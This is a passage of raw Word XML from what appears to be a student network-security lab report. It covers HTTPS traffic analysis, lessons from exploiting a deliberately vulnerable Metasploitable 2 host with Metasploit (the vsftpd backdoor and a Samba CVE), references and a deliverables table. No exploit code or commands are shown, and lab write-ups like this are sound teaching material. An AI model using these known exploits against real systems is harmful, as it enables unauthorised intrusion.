      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 5: Top Source IPs by Packet Count (left) and Traffic Volume by Host &amp; Protocol (right)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="180" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 Key Observations from Traffic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS 1.3 dominance: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Over 85% of captured HTTPS packets used TLSv1.3 with AES-256-GCM, confirming no legacy TLS 1.0/1.1 sessions were present.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Bimodal size distribution: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">36% of packets were at maximum MTU size (1,024–1,499B), reflecting TLS record fragmentation. 23% were small ACK/control packets (64–127B) — the typical mix for a healthy HTTPS connection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encrypted metadata leakage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Although payload content is encrypted, packet sizes and timing reveal session patterns. The Client Hello SNI field (visible in Wireshark's detail pane) discloses the destination hostname — a known TLS privacy limitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Key Learnings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network segmentation (VLANs + DMZ) is the most cost-effective security control available — it limits the blast radius of a compromise to one zone. Metasploitable 2 running unpatched in a flat network would be completely owned within minutes, as demonstrated by the dual root shells. Proper segmentation and firewall rules would have prevented lateral movement entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit revealed how dramatically easy exploitation becomes when default-credential and backdoor vulnerabilities exist. The vsftpd exploit achieved root access in under 3 seconds. The challenge was configuration: ensuring db_nmap results were properly loaded and the correct payload architecture (cmd/unix vs meterpreter) matched the target OS. This was resolved by checking the hosts table and running info on the module.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Analysing encrypted HTTPS traffic demonstrates that encryption hides content but not behaviour. Packet sizes, inter-arrival times, flow volumes, and SNI fields in Client Hello remain visible. This metadata is sufficient for traffic classification, anomaly detection, and even application fingerprinting — reinforcing why network monitoring remains critical even in fully encrypted environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Sources &amp; References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdy9vplrerd1w7jgi9vnabs">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://docs.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — docs.metasploit.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdk_niwmyv4dsd1lyon1lfz">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.wireshark.org/docs/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — wireshark.org/docs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdrkfvisz68x4h6_oitqqmj">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://scapy.readthedocs.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — scapy.readthedocs.io</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdzyloi97fwr27pqaehnayv">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://wiki.wireshark.org/TLS</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — wiki.wireshark.org/TLS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdoymeeydshn-erdo_7rexd">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cvedetails.com/cve/CVE-2011-2523/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — cvedetails.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rId1emlagfjsvvceaeqnwpfp">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.cvedetails.com/cve/CVE-2007-2447/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — cvedetails.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdwnujlkmcmsktotntu1e3y">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — rapid7.com/db</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:hyperlink w:history="1" r:id="rIdaogihysor6-3czdhntwdq">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t xml:space="preserve">https://draw.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — draw.io</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Deliverables Summary</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3200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="2C3E5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Deliverable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="2C3E5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Filename</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="2C3E5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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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Task 04 Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Task04_Report_ArmanKumar.docx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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Traffic Analysis Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">traffic_analyzer.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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Network Topology Diagram</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">t4_network_topology.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Embedded (Fig 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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Metasploit Console Screenshot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">t4_metasploit_console.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Embedded (Fig 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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Wireshark HTTPS Capture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">t4_wireshark_https.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Embedded (Fig 3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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Packet Size Distribution Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">t4_packet_size_chart.png</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EAFAF1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1E8449"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Embedded (Fig 4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>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IP Traffic Flow Chart</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="19"/>
